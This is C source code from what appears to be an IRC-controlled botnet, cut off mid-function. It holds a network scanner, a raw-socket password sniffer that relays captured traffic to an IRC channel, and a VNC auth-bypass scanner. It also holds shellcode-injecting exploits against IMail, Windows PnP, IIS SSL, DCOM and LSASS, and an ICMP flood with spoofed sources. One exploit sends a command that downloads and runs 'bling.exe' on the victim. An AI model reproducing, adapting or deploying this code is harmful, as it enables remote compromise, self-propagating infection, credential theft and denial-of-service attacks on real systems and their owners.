DWORD WINAPI AdvScanner(LPVOID param) { char buffer[LOGLINE]; ADVSCAN scan = *((ADVSCAN *)param); ADVSCAN *scanp = (ADVSCAN *)param; scanp->gotinfo = TRUE; advinfo[scan.threadnum].ip = finet_addr(scan.ip); CheckServers(scan); if (findthreadid(SCAN_THREAD) == 1) { DeleteCriticalSection(&CriticalSection); // just in case if (!InitializeCriticalSectionAndSpinCount(&CriticalSection, 0x80000400)) { sprintf(buffer,"Failed to initialize critical section."); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); return 0; } } advinfo[scan.threadnum].info = TRUE; for (unsigned int i=1;i<=(scan.threads);i++) { scan.cthreadid = i; sprintf(buffer,"%s:%d, Scan thread: %d, Sub-thread: %d.",scan.ip, scan.port,scan.threadnum,scan.cthreadid); scan.cthreadnum = addthread(buffer,SCAN_THREAD,NULL); threads[scan.cthreadnum].parent = scan.threadnum; if (threads[scan.cthreadnum].tHandle = CreateThread(0,0,&AdvPortScanner,(LPVOID)&scan,0,0)) { while (scan.cgotinfo == FALSE) Sleep(30); } else { sprintf(buffer, "Failed to start worker thread, error: <%d>.", GetLastError()); addlog(buffer); } Sleep(30); } if (scan.minutes != 0) Sleep(60000*scan.minutes); else while (advinfo[scan.threadnum].info == TRUE) Sleep(2000); IN_ADDR in; in.s_addr = advinfo[scan.threadnum].ip; sprintf(buffer,"%s Finished at %s:%d after %d minute(s) of scanning.", sc_title, finet_ntoa(in), scan.port, scan.minutes); if (!scan.silent) irc_privmsg(scan.sock,scan.chan,buffer,scan.notice); addlog(buffer); advinfo[scan.threadnum].info = FALSE; Sleep(3000); if (findthreadid(SCAN_THREAD) == 1) DeleteCriticalSection(&CriticalSection); clearthread(scan.threadnum); ExitThread(0); }
DWORD WINAPI SniffThread(LPVOID param) { char sendbuf[IRCLINE], rawdata[65535], *Packet; int i; DWORD dwRet, dwMode = 1; PSNIFF sniff = *((PSNIFF *)param); PSNIFF *sniffs = (PSNIFF *)param; sniffs->gotinfo = TRUE; IPHEADER *ip; TCPHEADER *tcp; IN_ADDR sia, dia; SOCKET sniffsock; SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons(0); ssin.sin_addr.s_addr = finet_addr(GetIP(sniff.sock)); if ((sniffsock = fsocket(AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) { sprintf(sendbuf, "[PSNIFF]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); clearthread(sniff.threadnum); ExitThread(0); } threads[sniff.threadnum].sock = sniffsock; if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) { sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); } while(1) { memset(rawdata, 0, sizeof(rawdata)); Packet = (char *)rawdata; if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) { _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); break; } ip = (IPHEADER *)Packet; if (ip->proto == 6) { Packet += sizeof(*ip); tcp = (TCPHEADER *)Packet; sia.S_un.S_addr = ip->sourceIP; dia.S_un.S_addr = ip->destIP; if (tcp->flags == 24) { Packet += sizeof(*tcp); if (strstr(Packet, "[PSNIFF]") == NULL) { for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) { if (strstr(Packet, pswords[i].text)) { _snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE); printf("%s\n",sendbuf); addlog(sendbuf); break; } } } } } } fclosesocket(sniffsock); clearthread(sniff.threadnum); ExitThread(0); }
BOOL iMail( char *target, void* conn,EXINFO exinfo ) { IRC* irc=(IRC*)conn; char szBanner[512];//, szShellcode[512]; int iRemoteTarget; int ibindsize=405; SOCKET sSocket; if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500); SOCKADDR_IN sinSockAddrIn; memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn)); sinSockAddrIn.sin_family = AF_INET; sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip); sinSockAddrIn.sin_port = fhtons(exinfo.port); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500); if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL))) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500); if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500); if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500); if (strstr(szBanner,"IMail 7.04")) iRemoteTarget = 0; else if (strstr(szBanner,"IMail 7.05")) iRemoteTarget = 1; else if (strstr(szBanner,"IMail 7.06")) iRemoteTarget = 2; else if (strstr(szBanner,"IMail 7.07")) iRemoteTarget = 2; else if (strstr(szBanner,"IMail 7.10")) iRemoteTarget = 3; else if (strstr(szBanner,"IMail 7.11")) iRemoteTarget = 4; else if (strstr(szBanner,"IMail 7.12")) iRemoteTarget = 5; else if (strstr(szBanner,"IMail 7.13")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 7.14")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 7.15")) iRemoteTarget = 6; else if (strstr(szBanner,"IMail 8.00")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.01")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.02")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.03")) iRemoteTarget = 7; else if (strstr(szBanner,"IMail 8.04")) iRemoteTarget = 8; else if (strstr(szBanner,"IMail 8.05")) iRemoteTarget = 9; else if (strstr(szBanner,"IMail 8.10")) iRemoteTarget = 10; else if (strstr(szBanner,"IMail 8.11")) iRemoteTarget = 12; else if (strstr(szBanner,"IMail 8.12")) iRemoteTarget = 13; else if (strstr(szBanner,"IMail 8.13")) iRemoteTarget = 14; else if (strstr(szBanner,"IMail 8.14")) iRemoteTarget = 14; else if (strstr(szBanner,"IMail 8.15")) iRemoteTarget = 15; else iRemoteTarget = -1; if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500); memcpy(szImailPacket + 12, bindshell, ibindsize -1); if (iRemoteTarget == -1) return FALSE; if (pImailTargets[iRemoteTarget].iSEHAddress == 0) memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4); else if (pImailTargets[iRemoteTarget].iSEHAddress == 1) memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500); if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500); fclosesocket(sSocket); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); return FALSE; }
BOOL VNCScanner(EXINFO exinfo) { char buffer[IRCLINE]; char szClientPacket[] = "\x01"; struct sockaddr_in thataddr; int res; SOCKET m_sock; m_sock = fsocket(PF_INET, SOCK_STREAM, 0); if (m_sock == INVALID_SOCKET) { fclosesocket(m_sock); return FALSE; } thataddr.sin_addr.s_addr = finet_addr(exinfo.ip); thataddr.sin_family = AF_INET; thataddr.sin_port = fhtons((unsigned short)exinfo.port); res = fconnect(m_sock, (LPSOCKADDR) &thataddr, sizeof(thataddr)); if (res == SOCKET_ERROR) { fclosesocket(m_sock); return FALSE; } //connected //now lets negotiate protocol rfbProtocolVersionMsg pv; if (!ReadExact(m_sock, pv, sz_rfbProtocolVersionMsg)) { closesocket(m_sock); return FALSE; } pv[sz_rfbProtocolVersionMsg] = 0; int m_majorVersion, m_minorVersion; if (sscanf(pv,rfbProtocolVersionFormat,&m_majorVersion,&m_minorVersion) != 2) { closesocket(m_sock); return FALSE; } if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) { //Server is not 3.8 closesocket(m_sock); return FALSE; } if (!WriteExact(m_sock, pv, sz_rfbProtocolVersionMsg)) { closesocket(m_sock); return FALSE; } //auth part CARD32 authScheme, authResult; // CARD8 challenge[CHALLENGESIZE]; //we expect to get 2 bytes if (!ReadExact(m_sock, (char *)&authScheme, 2)) { closesocket(m_sock); return FALSE; } //return clientpacket if (!WriteExact(m_sock, szClientPacket, 1)) { closesocket(m_sock); return FALSE; } if (ReadExact(m_sock, (char *) &authResult, 4)) { authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: { rfbServerInitMsg m_si; //send non-shared session request and receive data if (WriteExact(m_sock, (char *) useShared, sz_rfbClientInitMsg) && ReadExact(m_sock, (char *) &m_si, sz_rfbServerInitMsg)) { //lets get desktop name m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth); m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight); m_si.format.redMax = Swap16IfLE(m_si.format.redMax); m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax); m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax); m_si.nameLength = Swap32IfLE(m_si.nameLength); TCHAR *m_desktopName; m_desktopName = new TCHAR[m_si.nameLength + 2]; ReadString(m_sock, m_desktopName, m_si.nameLength); _snprintf(buffer, sizeof(buffer), "VNC%d.%d %s: %s - [AuthBypass]", m_majorVersion, m_minorVersion, m_desktopName, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; closesocket(m_sock); return TRUE; } break; } default: { break; } } } closesocket(m_sock); return FALSE; }
DWORD WINAPI ICMPFloodThread(LPVOID param) { ICMPFLOOD icmpflood = *((ICMPFLOOD *)param); ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param; icmpfloods->gotinfo = TRUE; char sendbuf[IRCLINE], szSendBuf[60]={0}; static ECHOREQUEST echo_req; SOCKET ssock; if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) { sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } BOOL flag = TRUE; if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } if (finet_addr(icmpflood.ip) == INADDR_NONE) { sprintf(sendbuf,"[ICMP]: Invalid target IP."); if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=fhtons(0); ssin.sin_addr.s_addr=finet_addr(icmpflood.ip); int sent = 0; unsigned long start = GetTickCount(); while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) { echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long)); echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST)); echo_req.ipHeader.ident=1; echo_req.ipHeader.frag_and_flags=0; echo_req.ipHeader.ttl=128; echo_req.ipHeader.proto=IPPROTO_ICMP; echo_req.ipHeader.checksum=0; echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock)))); echo_req.ipHeader.destIP=ssin.sin_addr.s_addr; echo_req.icmpHeader.type = rand()%256; echo_req.icmpHeader.subcode = rand()%256; echo_req.icmpHeader.id = (rand() % 240) + 1; echo_req.icmpHeader.checksum = 0; echo_req.icmpHeader.seq = 1; //fill the packet data with a random character.. memset(echo_req.cData, rand()%255, sizeof(echo_req.cData)); if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) { fclosesocket(ssock); _snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError()); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); } sent++; } fclosesocket(ssock); sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024)); if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice); clearthread(icmpflood.threadnum); ExitThread(0); }
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum ) { SOCKADDR_IN addr; int len; int sockfd; unsigned short smblen; char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; IRC* irc=(IRC*)conn; BOOL success=FALSE; char* thisTarget; int pnpbindsize=405; int TargetOS, Target; char* tOS=""; WSADATA wsa; fWSAStartup(MAKEWORD(2,0), &wsa); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; thisTarget = exinfo.ip; TargetOS=FpHost(thisTarget,FP_NP); if (TargetOS==OS_UNKNOWN) TargetOS=FpHost(thisTarget,FP_SMB); if (TargetOS == OS_WINNT){ Target=OS_WINNT; success=FALSE; }else if (TargetOS==OS_WINXP){ Target=OS_WINXP; success=FALSE; }else if (TargetOS==OS_WIN2K){ Target=OS_WIN2K; success=TRUE; }else{ success=FALSE; } ZeroMemory(&addr,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = finet_addr(thisTarget); addr.sin_port = fhtons((unsigned short)exinfo.port); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp,"\\\\%s\\IPC$",thisTarget); convert_name((char *)ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // Start prepare header -- dETOX mod -- memcpy(RPC_call + 260, Offsets[OffNum], 4); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); memcpy(ptr,bindshell,pnpbindsize-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE; frecv(sockfd, recvbuf, 4096, 0); if (!exinfo.silent && exinfo.verbose){ switch(Target){ case 1: tOS="WINNT"; break; case 2: tOS="WIN2K"; break; case 3: tOS="WINXP"; break; default: tOS="UNKNOWN/2K3/LINUX"; break; } irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip); } // if(success){ Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // } return TRUE; }
BOOL IIS5SSL(EXINFO exinfo) { char buffer[IRCLINE]; char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00"; unsigned long XOR=0xffffffff; unsigned long offsets[] = { 0x6741a1cd, // Win2K SP0 0x6741a199, // Win2K SP1 0x6741a426, // Win2K SP2 0x67419e1d, // Win2K SP3 0x67419ce8, // Win2K SP4 0x0ffb7de9, // WinXP SP0 0x0ffb832f // WinXP SP1 }; BOOL bRet = FALSE; unsigned char *badbuffer=(unsigned char*)malloc(347); memset(badbuffer, 0, 347); unsigned char *p=badbuffer; memcpy(p, request, sizeof(request)); p+=sizeof(request)-1; strcat((char*)p, jumper); strcat((char*)p, bind_shell_code); SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; // FIX ME: since i didnt found a way to determine the remote OS, i // placed this all together in a loop. this aint the best way // i'm sure about that for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) { memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { offsets[i]^=XOR; strncat((char*)p, (char*)&offsets[i], 4); strcat((char*)p, shellcode); if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) { Sleep(1000); fclosesocket(sSock); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(1981); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) { char cmd_buff[400]; #ifndef NO_TFTPD _snprintf(cmd_buff, sizeof (cmd_buff), "tftp -i %s get %s\r\n", GetIP(exinfo.sock),filename, filename); #endif #ifndef NO_FTPD _snprintf(cmd_buff, sizeof (cmd_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); #endif if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) { Sleep(500); if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) { fclosesocket(sSock); bRet = TRUE; _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); break; } } } } } fclosesocket(sSock); } } return (bRet); }
BOOL dcom(EXINFO exinfo) { char sendbuf[IRCLINE]; if (exinfo.port == 445) { NETRESOURCEW nr; if (!ConnectViaNullSession(exinfo.ip, &nr)) return FALSE; else { char szPipePath[MAX_PATH]; sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip); HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { CloseNullSession(exinfo.ip); return FALSE; } // sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip); // irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); int TargetOS = FpHost(exinfo.ip, FP_PORT5K); // get shellcode DWORD reqbufsize; char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE); if (!reqbuf) { CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } unsigned long lWritten; char *szInBuf = (char *)malloc(100000); memset(szInBuf, 0, 100000); // send the bind string DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL); if (szInBuf[2] != 0x0C) { free(szInBuf); free(reqbuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } // send the evil request if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) { free(szInBuf); free(reqbuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL); free(reqbuf); free(szInBuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); if (Result == TRUE) { return FALSE; } } } else { // port 135 and others int TargetOS = FpHost(exinfo.ip, FP_RPC); if (TargetOS == OS_WINNT) return FALSE; // get a funky fresh socket SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP); if (sSocket == SOCKET_ERROR) return FALSE; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); // get shellcode DWORD reqbufsize; char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE); if (!reqbuf) { fclosesocket(sSocket); return FALSE; } // connect to the server int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if (iErr == -1) { // connect failed, exit free(reqbuf); fclosesocket(sSocket); return FALSE; } // send the bind string if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } // read reply char recvbuf[4096]; frecv(sSocket, recvbuf, 4096, 0); // Send the evil request if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } // read reply if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } free(reqbuf); // Close the socket fclosesocket(sSocket); } sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } return TRUE; }
BOOL lsass2(EXINFO exinfo) { int i, targetx, len, targetxOS; char hostipc[40]; char hostipc2[40*2]; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(reqx4)+20]; char screq[BUFSIZE+sizeof(reqx7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4"; char strBuffer[BUFSIZE]; char buffer[IRCLINE], cmd_buff[400]; char smblen; char unclen; unsigned short port; SOCKET sSocket, bSocket; SOCKADDR_IN ssin, bsin; targetxOS = FpHost(exinfo.ip, FP_RPC); if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT)) return FALSE; if (targetxOS == OS_WINXP) targetx = 0; else if (rand() % 10) targetx = 1; else targetx = 2; _snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, reqx4, sizeof(reqx4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); port = fhtons(LSASS_BSPORT)^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); if ((targetx == 1) || (targetx == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4); memcpy(&buf[2036], &bindshell, strlen(bindshell)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], &bindshell, strlen(bindshell)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, bindshell, strlen(bindshell)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500); if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR) return FALSE; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) { fclosesocket(sSocket); return FALSE; } if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) { 